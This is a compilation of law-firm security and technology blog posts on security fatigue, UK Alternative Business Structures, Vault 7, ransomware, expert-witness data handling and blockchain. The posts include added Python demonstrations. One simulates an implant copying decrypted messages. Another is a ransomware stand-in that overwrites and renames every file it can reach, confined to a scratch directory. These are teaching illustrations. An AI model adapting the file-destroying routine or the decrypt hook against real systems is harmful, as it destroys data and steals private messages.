Channel: Sharon D. Nelson and John W. Simek, Author at Slaw

Security Fatigue and Its Impact on Law Firm Security

People are inherently lazy. After all, why do something today that you can put off until tomorrow? Users hate to do anything that would slow down their access to their computer or data. That means they would much rather just sit at a keyboard and start to surf the Internet instead of entering logon credentials and then entering a second factor. How many times have you been tired of the constant password changes only to resort to using one you know you’ll remember and have previously used? Didn’t feel like creating a new account so passed on that online purchase? You are not alone.

A recent study from the National Institute of Standards and Technology (NIST) found that the majority of typical computer users experience security fatigue, which leads to risky computing behavior at work and in their personal lives. Security fatigue is defined as a reluctance or weariness to deal with computer security. So what does this mean for law firms? A balanced approach is the way to go. If you make things too difficult for users, they will find ways around the security measures.

Noted security guru and cryptographer Bruce Schneier says “Stop trying to fix the user.” As Bruce said in a recent blog post, “The problem isn’t the users: it’s that we’ve designed our computer systems’ security so badly that we demand the user do all of these counterintuitive things. Why can’t users choose easy-to-remember passwords? Why can’t they click on links in emails with wild abandon? Why can’t they plug a USB stick into a computer without facing a myriad of viruses? Why are we trying to fix the user instead of solving the underlying security problem?”

We need to be smarter about how we design secure environments for law firm users. Forget about the security warnings. Do you really think anyone reads the pop-up dialog box warning that a certificate is expired or cannot be verified? The user doesn’t really care. They would much rather see a “get rid of me” button so they can get to the website. Passwords aren’t much better, especially for sites that are rarely visited. The user will elect to save the password in the browser (a real risk, since anything that reaches the browser profile reaches every saved credential) or constantly use the “I forgot my password” link, which means they are falling back on the security of their e-mail system, since that’s where the reset link goes. Users aren’t going to pay attention to links either, whether valid or from phishing attacks. Users know that a link gets you where you want to go, so we’ll never fully teach them to be suspicious of links.

We need to stop trying to protect the user from themselves. To combat security fatigue, we need to make the environment more secure no matter what the user does. Virtual environments and sandboxing keep applications running in a walled-off area, separated from the user’s system, so malware embedded in a document or web page is contained rather than running with the user’s access. Automatic updates help too, since the user won’t have to remember to apply updates manually.

The NIST study provided evidence for three ways to help reduce security fatigue.

  1. Limit the number of security decisions a user needs to make
  2. Make it simple for a user to choose the right security action
  3. Design for consistent decision making whenever possible

We will never be able to provide a 100% secure environment, but we can get a heck of a lot closer by reducing security fatigue and removing the user from the decision making process as often as possible.


Interview With Knights CEO David Beech: Alternative Business Structures Across the Pond

Recently, author Nelson had the pleasure of interviewing David Beech, the CEO of the professional services firm Knights in the UK. David has led the business, originally a law firm, since 2011. His vision for Knights is to become the leading regional professional services business in the UK.

The interview took place on the Legal Talk Network podcast (The Digital Edge: Lawyers and Technology) with co-host Jim Calloway, available at http://legaltalknetwork.com/podcasts/digital-edge/2017/01/will-alternative-business-structures-u-k-law-firms-cross-pond/.

By way of introducing David, he qualified as a corporate lawyer in 1990 and in the late 1990s turned to law firm management, until 2004 when he left the practice of law to raise and manage a private equity fund. He brought these skills together by leading Knights to become the first professional services firm to raise external private equity investment, in June of 2012, and to become the fastest growing commercial firm in the UK.

According to David, the UK Legal Services Act, passed in 2007, and subsequent regulations issued in 2012, resulted in hundreds of law firms applying for Alternative Business Structure (ABS) licenses. ABS differs from how law firms in the US operate in two fundamental ways: Lawyers and non-lawyers can share in the management and control of these businesses and they can have non-lawyer investment. But David said that, after the flood of license applications (about 600 of them), only about 25 law firms actually used the licenses once they had them, bringing in external, non-lawyer investors who became partial owners of the ABS.

David is fond of saying that Knights is a model of merit, not of tenure. In fact, he calls Knights a meritocracy. As Knights became more of a business than a traditional law firm, overhead went down. There are 400 lawyers but there are no secretaries. Lawyers handle their own correspondence and billing. They have found that a lawyer can generate a bill in about three minutes. All lawyers receive technology training to make them more efficient. They also work to measure return on marketing efforts and most importantly, they receive extensive training in client engagement which he believes is critical to client retention.

When Knights underwent its transformation, it was recovering 74% of chargeable time recorded. Today, it recovers 92% of chargeable time recorded. Impressive, yes? 60% of their engagements are flat fee. Their focus is away from showing fees per tasks on bills – they are careful to show all chargeable time instead. Clients have proven to appreciate the amount of work done – and of course, the successful results!

Unsurprisingly, the firm achieves efficiencies by stressing project management. It also responded to clients’ desire to be given “more for less” by bringing in paralegals to do lower level work.

As they converted over to the new system, there was almost no loss of partners. There were certainly emotional struggles going from being owners to being employees, but the lawyers found (to their surprise) that most of them were not faced with financial negatives. In fact, those who produced well, which was the majority, got steady and gratifying salary increases – and were relieved of all the headaches of management, including a lot of boring meetings and details, and therefore able to focus on the practice of law. Clients also enjoyed the increased access to their lawyers.

Currently, Knights has 104 lawyer partners, all salaried employees. With no equity profit sharing, it is, in David’s judgment, much easier to attain a “team” philosophy. Work is shared between lawyers, associate and paralegals – they brought in 140 paralegals after they transitioned. No one has big fancy offices. They work together side by side, sharing the tasks of client representation. David says they have had to “manage out” people who cannot seem to become part of a team because they are focused on a hierarchical structure.

David doesn’t claim all this was easy. Business people and lawyers react differently. Lawyers want to divvy up pots of money at year’s end and business people want to reinvest monies in the firm. They had to work hard to establish a new culture – as David says, “to win their hearts and minds”. The lawyers learned that the business managers, and there are not many of them, had no interest in interfering in legal work. Slowly, the vast majority of lawyers found themselves adopting the team outlook and culture.

In the US, we hear the fear that there will be less emphasis on legal ethics in an ABS, but David refutes that – in fact he calls that fear “rubbish.” He believes ethical compliance is greater now that managers monitor it. Without strong ethics, the firm brand – and therefore business – would suffer.

Another American concern is access to justice. David acknowledges that his firm is a business to business law firm, so he is unable, based on his experience, to speak to that issue. He does acknowledge freely that access to justice is as much a problem in the UK as it is in the US.

One notable ABS failure, in Australia, was Slater and Gordon. David’s view is that they simply made a mistake by buying the professional services arm of the British insurance claims processor Quindell for too much money.

When asked about ABS coming to the US, David said investors and clients will find a way to compete with lawyers whether or not ABS is used. Change will simply happen, driven by clients and investors. Not to embrace ABS is, in his view, missing an opportunity. It is a better and safer path to keep legal services in a regulated environment. Lacking a crystal ball, he was reluctant to predict whether ABS will come to our side of the pond, but he certainly took note of the ferocity of the resistance to ABS in the US. He notes mildly that American lawyers seem to see ABS as a threat to their profession and seem blind to the opportunities offered by an ABS.

One thing David noted at the end of the interview was that he is surprised that more American lawyers haven’t visited him to “chat him up” about running a successful ABS. So if you find yourself in the UK, he invites you to come and see him. I’m pretty sure he can come up with a wonderful piping hot cup of tea.

The Real Lesson of the WikiLeaks Vault 7 Document Dump

Some days are just more interesting than others. You could almost hear the mournful wailing of spooks (the CIA kind) as WikiLeaks released thousands of documents describing sophisticated software tools used by the Central Intelligence Agency to break into smartphones, computers and even Internet-connected televisions.

The New York Times reported that the documents, at first review, appeared to be authentic. The initial release, which WikiLeaks said was only the first part of the document collection, included 7,818 web pages with 943 attachments. The entire archive of CIA material consists of several hundred million lines of computer code according to WikiLeaks.

Initial reports overstated what the technology could do, suggesting that the encryption of popular apps such as Signal and WhatsApp had been compromised. As the details became clearer, it was noted that the apps themselves were NOT compromised. Rather, if the phone itself is compromised, by malware for example, the app’s encryption no longer helps: the app has to decrypt each message for you to read it, and an attacker sitting on the device can read it at that same point, without ever touching the key or the cipher. The real news was that both Android phones and iPhones had allegedly been compromised by the CIA and allied intelligence services, and on a compromised phone apps such as Signal and WhatsApp cannot protect your privacy.
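The point in the paragraph above is a threat-model boundary rather than a weakness in any cipher, and it is easiest to see by running it. The script below is an added illustration, not code from the Vault 7 documents or from Signal or WhatsApp: it uses a minimal HMAC-SHA256 keystream cipher (an assumption chosen so it runs on a stock Python install; a real messenger uses a vetted AEAD) and a hypothetical `Phone` class whose `decrypt_incoming` method is the app’s plaintext boundary. Three vantage points are shown: the wire, which sees only ciphertext; the legitimate recipient; and the same recipient with a device-level implant hooked onto the app’s decrypt path.

```python
"""End-to-end encryption versus a compromised endpoint (added illustration)."""
import hashlib
import hmac
import os


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Derive `length` bytes of keystream from (key, nonce): HMAC-SHA256 in counter mode."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key: bytes, plaintext: bytes) -> tuple:
    """Return (nonce, ciphertext). The nonce is fresh per message and travels in the clear."""
    nonce = os.urandom(16)
    ks = keystream(key, nonce, len(plaintext))
    return nonce, bytes(p ^ k for p, k in zip(plaintext, ks))


def decrypt(key: bytes, nonce: bytes, ciphertext: bytes) -> bytes:
    ks = keystream(key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, ks))


class Phone:
    """Hypothetical messaging app on one device. decrypt_incoming is the plaintext boundary."""

    def __init__(self, shared_key: bytes):
        self._key = shared_key   # stands in for the app's session key
        self.screen = []         # what the user sees

    def send(self, plaintext: bytes) -> tuple:
        return encrypt(self._key, plaintext)

    def decrypt_incoming(self, nonce: bytes, ciphertext: bytes) -> bytes:
        plaintext = decrypt(self._key, nonce, ciphertext)
        self.screen.append(plaintext)
        return plaintext


def install_implant(phone: Phone) -> list:
    """Model of a device-level implant: it hooks the app's decrypt path and copies
    plaintext out. It never needs the key and never attacks the cipher."""
    exfiltrated = []
    original = phone.decrypt_incoming

    def hooked(nonce, ciphertext):
        plaintext = original(nonce, ciphertext)
        exfiltrated.append(plaintext)   # the real thing ships this to a covert server
        return plaintext

    phone.decrypt_incoming = hooked
    return exfiltrated


def wire_can_read(ciphertext: bytes, plaintext: bytes) -> bool:
    """Network observer's view: does any 4-byte window of the plaintext show up in the ciphertext?"""
    return any(plaintext[i:i + 4] in ciphertext for i in range(len(plaintext) - 3))


def run_scenario(message: bytes = b"settlement offer: 2.4M, do not forward") -> dict:
    """Constructed scenario: Alice messages Bob; Bob's handset carries an implant."""
    key = os.urandom(32)          # agreed out of band; the wire never sees it
    alice, bob = Phone(key), Phone(key)
    leaked = install_implant(bob)

    nonce, ciphertext = alice.send(message)
    return {
        "wire_sees_plaintext": wire_can_read(ciphertext, message),
        "bob_reads": bob.decrypt_incoming(nonce, ciphertext) == message,
        "implant_reads": leaked == [message],
    }


if __name__ == "__main__":
    print(run_scenario())
```

The implant gets the message because it runs after the app has done its job, which is exactly why patching the device matters more than which messenger is installed on it.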

The source of the documents was not named. WikiLeaks said the documents, which it called Vault 7 (where DO they come up with these monikers?), had been “circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.”

WikiLeaks said the source, in a statement, set out policy questions that “urgently need to be debated in public, including whether the CIA’s hacking capabilities exceed its mandated powers and the problem of public oversight of the agency.” The source, the group said, “wishes to initiate a public debate about the security, creation, use, proliferation and democratic control of cyberweapons.”

The documents are dated from 2013 to 2016. WikiLeaks, which has sometimes been accused of recklessly leaking information that could do harm, said it had redacted names and other identifying information from the collection. It said it was not releasing the computer code for actual, usable cyberweapons “until a consensus emerges on the technical and political nature of the C.I.A.’s program and how such ‘weapons’ should be analyzed, disarmed and published.”

One revelation is about a program called Weeping Angel which uses Samsung “smart” televisions as covert listening devices. According to the WikiLeaks news release, even when it appears to be turned off, the television “operates as a bug, recording conversations in the room and sending them over the internet to a covert C.I.A. server.” We had previously speculated that this might be true but take no pleasure in being right. As it turns out, CNET reported that the implant only works on certain firmware versions and has to be installed with physical access to the TV.

Another program described in the documents, named Umbrage, is a voluminous library of cyberattack techniques that the CIA has collected from malware produced by other countries, including Russia. According to the WikiLeaks release, the large number of techniques allows the CIA to mask the origin of some of its cyberattacks and confuse forensic investigators. This is another great fear of ours. If we are under a cyberattack, how do we respond with assurance that we have traced the attack back to its true source? Once code can be borrowed, code similarity alone is weak evidence of origin; attribution needs corroboration from infrastructure, targeting and timing. And God help us if we have autonomous machines with AI helpfully doing all these investigations for us. We truly “ride the lightning” in the cyberwarfare era.

Despite all the reports of the CIA’s hacking ability, the real message is to make sure your devices have the most recent versions of firmware and software. In other words, update, update, update. The vulnerabilities reported so far are ones the vendors have already patched; Apple, Google and Microsoft have said that current versions of their products are protected against most of the tools identified in the WikiLeaks documents. An ironic outcome of the WikiLeaks dump has China very concerned that the United States has the ability to hack into devices made by Chinese companies. The WikiLeaks documents mentioned that network routers manufactured by Chinese firms Huawei and ZTE could be hacked using the CIA tools. Chinese Foreign Ministry spokesman Geng Shuang said, “We urge the U.S. side to stop listening in, monitoring, stealing secrets and internet hacking against China and other countries.” Apparently, what’s good for the goose isn’t good for the gander.

Ransomware: No Honor Among Thieves and More Expensive

The FBI says that ransomware nets cybercriminals $1 billion a year. No wonder so many people want a piece of that pie.

Computerworld recently reported that hackers spreading ransomware are getting greedier. In 2016, the average ransom demand to provide the decryption key for encrypted data rose to $1,077, up from $294 the year before, according to a report from security firm Symantec. Symantec also reported a 36% increase in ransomware in 2016 from the prior year. We are aware of small law firms in Virginia that paid $1200 and $3000 to get their data back – the damage being furthered by the length of time it took to restore the data.

Helping to fuel the ransomware boom is the digital black market, where hackers can sell ransomware kits for as little as $10 and as much as $1,800, making it easier for other cybercriminals who can’t code to get a piece of the action.

Cybercriminals also spread ransomware through exploit kits, or automated hacking toolsets, that operate on compromised websites. The kits can work by scanning a victim’s web browser for any unpatched software vulnerabilities and then exploiting them to serve ransomware. We are guessing that most readers didn’t know that this was an attack surface – most people think ransomware can only be contracted by opening an e-mail and clicking on a link or attachment – that’s certainly the most common way, but there are others!

Symantec’s report found that 34 percent of victims pay the ransom. However, only 47 percent of that number reported getting their files back. In a business where trusting the bad guys is important, figures like these may diminish the number of victims willing to “pay up.”

Dark Reading also recently reported that about 40% of small and midsized businesses hit with ransomware paid their attackers, but less than half got their information back. This data came from a Bitdefender survey of 250 IT pros working in small and medium businesses (SMBs).

This survey, conducted by Spiceworks, discovered that one in five SMBs was hit with a ransomware attack within the past 12 months. Of the 20% targeted, 38% paid attackers an average of $2,423 to release their data. Less than half (45%) got their information back. The honor among thieves is clearly evaporating.

As attackers seek weaker victims, SMBs are favored targets. Larger businesses have strongly engineered backups and high level security tools. Researchers have found SMBs are appealing targets for ransomware because they handle the same sensitive business information (customer data, financial records, product info) as larger organizations, but lack the strong security measures to protect it. Attackers know they’re more likely to receive payment from SMBs, which have more sensitive data than consumers.

E-mail, cited by 77% of SMBs – as mentioned above – is the most popular vector of attack.

Most SMBs hit with ransomware attacks were able to mitigate the attack by restoring data from backup (65%), or through security software or practices (52%). One-quarter of those targeted could not find a solution to address the infection and lost their data as a result. Since our clients are largely SMBs, we can affirm that they are more vulnerable – and sometimes resist a well-engineered backup system because they don’t fully appreciate the danger and are resistant to the costs – which tend to seem very minor once they’ve become a ransomware victim. After being hit with ransomware, they tend to ask us for a proposal to enhance their backup system so they can in fact get their data back.

Though the FBI and other law enforcement agencies counsel ransomware victims not to pay, if they haven’t properly engineered their backups to recover the data, many say they have no choice but to pay. Payments (usually in bitcoin) used to be in the $300-$500 range but we are seeing much larger demands these days. Some entities are even stockpiling bitcoins so they can pay the cybercriminals quickly. Some entities make a business decision that the cost of paying the ransom is cheaper than being out of business for some period of time while data is recovered. A good example is hospitals, which are likely to be sued if there are errors made because of the inability to get to data.

While the FBI counsels victims not to pay, agents are apt to whisper “but you gotta do what you gotta do.”

Calls we’ve received from ransomware victims are panicky conversations – and most of the panic stems from not having a properly engineered backup. Properly engineered means at least one copy that the infected workstation cannot reach or overwrite, enough retained versions to go back past the infection, and a restore that has actually been tested. This is a classic case – don’t be pennywise and pound foolish. Invest in a good backup system and, even if no one is completely impervious to ransomware, you’ll sleep better knowing that you can quickly recover from a ransomware infection.
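The failure mode behind most of those panicky calls is a backup that the infected machine could write to. The script below is an added example, not code or data from the Symantec, Bitdefender or Spiceworks reports cited above: it builds a throwaway directory tree with a workstation, a backup share mapped on that workstation, and an offline copy (all constructed), runs a ransomware stand-in over everything the workstation can write to, and then tests a restore from each backup against a hash manifest taken before the incident. The “encryption” is a scramble-and-rename; real ransomware encrypts, but for a restore test the only thing that matters is that the file is unusable.

```python
"""Reachable backups are not backups: a file-system simulation (added example)."""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def manifest(root: Path) -> dict:
    """Relative path -> content hash for every file under root. Take it BEFORE the incident."""
    return {str(p.relative_to(root)): sha256_file(p) for p in root.rglob("*") if p.is_file()}


def ransomware(reachable_roots: list, note: str = "README_DECRYPT.txt") -> int:
    """Stand-in for a ransomware run under the user's account: every writable file it can
    reach is destroyed and renamed, and a ransom note is dropped at each root."""
    hit = 0
    for root in reachable_roots:
        for p in list(root.rglob("*")):
            if p.is_file() and p.name != note:
                p.write_bytes(os.urandom(p.stat().st_size))   # stands in for encryption
                p.rename(p.with_name(p.name + ".locked"))
                hit += 1
        (root / note).write_text("Your files are encrypted. Pay in bitcoin.")
    return hit


def restore(backup_root: Path, target_root: Path) -> None:
    """Wipe the target and copy the backup over it."""
    shutil.rmtree(target_root)
    shutil.copytree(backup_root, target_root)


def restore_is_good(target_root: Path, expected: dict) -> bool:
    """A restore only counts if every file in the pre-incident manifest is back, byte for byte."""
    for rel, digest in expected.items():
        p = target_root / rel
        if not p.is_file() or sha256_file(p) != digest:
            return False
    return True


def run_scenario() -> dict:
    base = Path(tempfile.mkdtemp(prefix="ransomware-demo-"))
    try:
        workstation = base / "workstation"
        (workstation / "matters").mkdir(parents=True)
        for name in ("smith_v_jones.docx", "retainer.pdf", "timesheet.xlsx"):
            (workstation / "matters" / name).write_bytes(os.urandom(512))   # constructed data

        # Two backup copies taken while everything is still healthy.
        mapped_backup = base / "backup_share"    # mounted on the workstation as a drive letter
        offline_backup = base / "offline_copy"   # rotated disk or immutable store; not reachable
        shutil.copytree(workstation, mapped_backup)
        shutil.copytree(workstation, offline_backup)
        before = manifest(workstation)

        # The infection runs with the user's rights: the workstation AND the mapped share are writable.
        files_hit = ransomware([workstation, mapped_backup])

        restore(mapped_backup, workstation)
        mapped_ok = restore_is_good(workstation, before)

        restore(offline_backup, workstation)
        offline_ok = restore_is_good(workstation, before)

        return {"files_hit": files_hit, "mapped_restore_ok": mapped_ok, "offline_restore_ok": offline_ok}
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    print(run_scenario())
```

The mapped share fails the restore test because it was scrambled along with the workstation; only the copy the infected account could not write to brings the matter files back. The manifest check is the part most firms skip: a backup job that reports success but has never been restored against known-good hashes is an assumption, not a recovery plan.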

Can You Trust Your Expert Witnesses With Confidential Data?

Not always. There was a recent case in which confidential data was not, to put it mildly, well handled. The corporate defendant, a mortgage servicer, was accused of violating a consumer’s privacy rights based on the manner in which it handled collection calls. The defendant protected its customer data with layers of network security consistent with best practices and ISO guidelines. During discovery, the plaintiff’s experts received the calling data and copies of the customer service call recordings.

Both experts had unrelated full-time day jobs. Their expert witness work was a side business run out of their homes. Neither expert had a technical degree, and neither had taken a course in data security for over a decade. Both experts stored the sensitive case data in their homes. There were no locks on the doors to their home offices, so anyone in the houses had access to the drives. Neither expert was familiar with the basic ISO standards relating to data security. Neither had a written data security plan for their home network, and no outside company had ever performed vulnerability or penetration testing on their networks. One expert had no automatic intrusion detection software on his network. Both routinely produced data with sensitive PII (personally identifiable information) in unencrypted form.

The produced debt-collection calls included highly personal discussions in which debtors explained why a mortgage was in default, such as health or financial problems. One expert testified that he kept these recordings on an unencrypted portable laptop and accessed it on his home and public Wi-Fi networks. He also produced the call recordings to a third party to obtain technical assistance. The third party was not asked to execute the protective order, and that data presumably still resides on the third party’s servers.

Well, you get the message. Expert witnesses, including us, routinely receive highly sensitive PII for review and analysis. Sensitive PII (SPII) is data that, if lost, compromised or disclosed without authorization, could result in substantial harm or embarrassment to the individual.

Attorneys cannot ignore how their experts manage the data produced to them. When highly sensitive data is produced in a lawsuit, it is removed from the protected network environment built by the data’s owner and produced to the lawyers on the other side. The manner in which it is produced is up to the producing party. Sometimes the data is scrubbed of identifying information, such as names and dates of birth, but not always. Sometimes it is produced on encrypted drives, but again, not always. Instructions are rarely given to an expert regarding the manner in which to store the data or the type of security controls that need to be employed to keep it safe from unauthorized disclosure. That is certainly true. I can only recall a handful of cases where attorneys have given us explicit instructions.

Confidential data produced in a lawsuit is often subject to a protective order that contains generic language that the data will be kept confidential. Protective orders typically do not specify the security measures that the receiving party needs to have in place. The promise to keep the data protected is considered enough.

Under most protective orders, the receiving party has the right to produce the confidential information it receives to its experts in the case. Those experts are in turn required to sign the protective order and promise to protect the data. Again, the promise to keep the data protected is considered enough.

Experts at sophisticated firms generally have very competent IT and cybersecurity support. They could still be breached, but it is less likely than when engaging experts who are self-employed or who work in small firms with limited support.

Concrete suggestions?

Pay attention to physical security. Our forensics lab requires a prox card and a registered fingerprint to enter. Entries into or out of the lab are video recorded. There is a dual authenticated safe in the lab for high profile cases. Only three of us have access to that safe. We have a security system with motion sensors – and the police will be summoned unless someone with authority quickly acknowledges an equipment problem or a mistake (such as arming the system when someone is still in the lab – and yes, of course that has happened). We have a human receptionist monitoring the front door – in addition to more surveillance cameras. The building itself is locked nights and weekends.

Pay attention to logical security. Our evidence is on standalone offline hard drives or on a NAS unit which has no Internet access. The local network in the forensics lab is dedicated to forensic usage, unconnected to our corporate network. There are software and hardware protections for the lab network as well.

Pay attention to production security. It is the way of the world that most of our productions, by the instructions of our clients, are made via Dropbox. It makes sense since it is instantly available, though one must trust that the receiving party does not give access to anyone who shouldn’t have it. All production files are encrypted using 7-Zip before being placed in Dropbox, with the password given via phone or a separate e-mail (not the e-mail containing the Dropbox link). One caveat on 7-Zip: its AES-256 encryption covers file contents only unless header encryption is also turned on (the -mhe switch on the command line, or the “Encrypt file names” box in the GUI); without it, anyone who obtains the archive can list the names of the files inside. If a file is small enough for Mimecast’s Large File Send, we may use that, as the data is encrypted as part of the process.

If we use the old school method of shipping drives, they are always encrypted.

There may be more security measures that are not coming to mind, but those are the basics. And, of course, if there is a court order with specific mandates, that order must be strictly adhered to. Most of them, as noted, do not require specific measures.

The Blockbuster That Is Blockchain: What It Means to the Practice of Law

Several years ago, a Canadian attorney and good friend of ours, invested $10,000 in bitcoin. Clearly, he is a lot smarter than us. We can’t even imagine the extent of his profit – several days before we started to write this article, bitcoin hit an all-time high of $4,991.66 on September 2, 2017. It is down slightly as we write, but our friend certainly hit a jackpot.

We became aware of bitcoin wallets a few years ago, as husbands (mostly) began to hide assets from their soon-to-be ex-wives in those wallets. And then came a barrage of ransomware attacks. Law firm after law firm was paying the ransom ($300-$500 in the early days and $1500-$3000 today). The cybercriminals usually want the ransom in bitcoin. To our amazement, there are now bitcoin ATMs available in local gas stations and laundromats, complete with posted instructions on creating a bitcoin wallet for the Bitcoin novice.

In July, there were reports of a Citrix UK study which found that a third of UK companies were stockpiling digital currency, mostly in bitcoins, to pay the ransom (an average of approximately $176,000) if they became victims of a ransomware attack.

At the 2017 ILTACON conference, artificial intelligence wasn’t quite kicked to the curb, but the buzz around blockchain became very loud indeed. In the last several months, it has become increasingly clear that blockchain is a transformative technology that is going to make substantial changes in the practice of law.

What is blockchain?

There are arguments about the definition but we liked this one from TechTarget:

“Blockchain is a type of distributed ledger for maintaining a permanent and tamper-proof record of transactional data. A blockchain functions as a decentralized database that is managed by computers belonging to a peer-to-peer (P2P) network. Each of the computers in the distributed network maintains a copy of the ledger to prevent a single point of failure (SPOF) and all copies are updated and validated simultaneously.

In the past, blockchains were commonly associated with digital currencies, and Bitcoin in particular. Today, blockchain applications are being explored in many industries as a secure and cost-effective way to create and manage a distributed database and maintain records for digital transactions of all types.”

The second paragraph of that definition is particularly interesting because law firms are now “getting” the possibilities of blockchain. While the technology first ran in public as Bitcoin’s ledger when that network launched in 2009, we now realize that the same technology can be used for contracts, real estate transactions, bank and stock market transactions – and the list goes on and on.
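To make the “permanent and tamper-proof record” in that definition concrete, here is a minimal hash-chained ledger. It is an added example, not Bitcoin’s code or anything from the consortium discussed later: each block commits to the hash of the block before it, so changing one entry changes its hash, which breaks the link stored in the next block, and so on to the tip. The digital signatures, proof of work and peer-to-peer gossip of a real chain are left out; a simple majority over the copies held by a handful of hypothetical nodes stands in for them at the end. Timestamps and ledger entries are constructed.

```python
"""Minimal hash-chained ledger with tamper detection (added example)."""
import hashlib
import json
from collections import Counter


def block_hash(index: int, prev_hash: str, timestamp: int, data: str) -> str:
    """Hash of the block's contents in a canonical encoding (fixed key order, no whitespace)."""
    payload = json.dumps(
        {"index": index, "prev_hash": prev_hash, "timestamp": timestamp, "data": data},
        sort_keys=True, separators=(",", ":"),
    ).encode()
    return hashlib.sha256(payload).hexdigest()


def build_chain(entries: list) -> list:
    """entries: list of (timestamp, data). The genesis block commits to an all-zero prev_hash."""
    chain = []
    prev = "0" * 64
    for i, (ts, data) in enumerate(entries):
        h = block_hash(i, prev, ts, data)
        chain.append({"index": i, "prev_hash": prev, "timestamp": ts, "data": data, "hash": h})
        prev = h
    return chain


def verify_chain(chain: list) -> tuple:
    """(True, -1) if every block hashes correctly and links to its predecessor,
    otherwise (False, index of the first bad block)."""
    prev = "0" * 64
    for i, b in enumerate(chain):
        if b["index"] != i or b["prev_hash"] != prev:
            return False, i
        if block_hash(i, b["prev_hash"], b["timestamp"], b["data"]) != b["hash"]:
            return False, i
        prev = b["hash"]
    return True, -1


def rewrite_from(chain: list, index: int, new_data: str) -> list:
    """What an attacker must do for a change to validate: alter the entry AND recompute
    every hash from that block to the tip. Returns a new chain; the original is untouched."""
    entries = [(b["timestamp"], b["data"]) for b in chain]
    entries[index] = (entries[index][0], new_data)
    return build_chain(entries)


def majority_tip(copies: list) -> str:
    """Replicated ledgers: the tip hash most nodes hold wins, so a lone rewritten copy loses."""
    tips = Counter(c[-1]["hash"] for c in copies)
    return tips.most_common(1)[0][0]


def demo() -> dict:
    ledger = build_chain([(1500000000, "matter 4711 opened"),
                          (1500000600, "engagement letter v1 filed"),
                          (1500001200, "engagement letter v2 filed")])
    honest_copies = [list(ledger) for _ in range(4)]   # four hypothetical nodes

    # 1. Silent edit: change the data, leave the stored hash alone -> caught at that block.
    edited = [dict(b) for b in ledger]
    edited[1]["data"] = "engagement letter v1 FORGED"
    silent = verify_chain(edited)

    # 2. Fix only that block's hash -> the next block's prev_hash no longer matches.
    edited[1]["hash"] = block_hash(1, edited[1]["prev_hash"], edited[1]["timestamp"], edited[1]["data"])
    one_fixed = verify_chain(edited)

    # 3. Full rewrite to the tip: internally valid, but it disagrees with every other node's copy.
    rewritten = rewrite_from(ledger, 1, "engagement letter v1 FORGED")
    return {
        "original_valid": verify_chain(ledger),
        "silent_edit": silent,
        "one_hash_fixed": one_fixed,
        "rewritten_valid": verify_chain(rewritten),
        "rewritten_matches_network": rewritten[-1]["hash"] == majority_tip(honest_copies + [rewritten]),
    }


if __name__ == "__main__":
    print(demo())
```

The third case is the one to keep in mind when reading vendor claims: hash chaining alone does not stop a party that controls the only copy from rewriting history consistently. Tamper evidence comes from the hashes; tamper resistance comes from replication and, in a real chain, from signatures and the cost of rewriting.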

Back to Bitcoin

Why back to Bitcoin? Well, it has already taught us a number of lessons. The cryptocurrency market is highly volatile. And as the number one cryptocurrency (Ethereum’s ether is generally held to be second), Bitcoin is receiving unwelcome attention. As was reported in August 2017, the IRS is coming after those who are profiting from Bitcoin transactions (legally or illegally, they are all supposed to be reporting income) and those who have made monies by investing in bitcoin.

The gap between the number of people dealing in bitcoin and the number declaring income from it is wide – very, very wide. The IRS said in court documents that between 2013 and 2015, fewer than 900 people per year reported income on Form 8949, which is used to account for “a property description likely related to Bitcoin.” That compares pathetically to the number of people using Coinbase – “the largest exchanger in the US of bitcoin into US dollars,” according to the government – with 4.8 million users and 10.6 million wallets.

Since Coinbase is under heavy scrutiny, many criminals (and others) have left Bitcoin in favor of other virtual currencies like Zcash, which promises to “fully protect the privacy of transactions using zero-knowledge cryptography,” or Monero, which says it offers “secure, private, untraceable currency.”

Also in August, the SEC issued its most comprehensive public guidance to date on digital assets such as cryptocurrencies and tokens. Key points:

  • Initial Coin Offerings (ICOs) are required to be registered with the SEC if the digital assets are securities offered or sold in the U.S.
  • Digital assets can be evaluated for securities status using traditional securities law criteria
  • Automated functions through smart contracts or other code remain subject to securities laws
  • Companies dealing in digital assets should consider seeking counsel as to whether the digital assets are securities
  • Companies dealing in digital currencies may need to register as broker-dealers, securities exchanges, or alternative trading systems
  • Companies investing in digital assets and advising on investment may need to register as investment companies or investment advisers

The SEC did not conclude that all tokens and cryptocurrencies are securities, but confirmed how the SEC would evaluate cryptocurrencies. The SEC also noted that form should be disregarded for substance and that economic realities should be a key to the analysis. Thus, any party contemplating a future ICO that is available to investors located in the U.S. should analyze the extent to which the offered asset could be considered a security. This analysis should reach the business model underpinning the offered assets and not be limited to the white paper description of the offered digital assets.

Therefore, companies doing business with digital currencies with U.S. investors might be in violation of U.S. securities laws and may be required to register with the SEC and to comply with applicable securities regulations.

And hold your hat – according to a September 4th story in Naked Security, more than 900 cryptocurrencies are currently in existence. Conventional banks would do well to be rattled by that. So far, the estimated $150 billion value of the top 20 cryptocurrencies is still a tiny fraction – 3% – of the $5 trillion in conventional currency circulating every day. But it is growing.

Blockchain and the Practice of Law

On August 15th, a group of law firms and technology companies announced the formation of the Global Legal Blockchain Consortium. The consortium will work to drive the adoption and standardization of blockchain in the legal industry, with the larger goal of improving the security and interoperability of the global legal technology ecosystem.

As noted in an Above the Law post by our friend Bob Ambrogi, members of the consortium include the law firms Baker Hostetler and Orrick, IBM Watson Legal, and the newly formed company Integra Ledger, which hopes to become the ledger used throughout the legal industry for blockchain digital identities.

The consortium’s three goals for the future of blockchain in legal:

  • An interoperable and secure global legal industry using blockchain technology
  • Agnostic as to software, agnostic as to document management systems, and agnostic as to blockchain
  • Universal, blockchain-based identities for law – client identity, matter identity, document identity

Drummond Reed, chief trust officer at Evernym, said, “With a blockchain, every transaction is digitally signed, every transaction is chained together, and it’s replicated on hundreds of computers around the world with digital signatures,” noting that Bitcoin has never been hacked in its nine years of existence. But please do read to the end of this story . . .

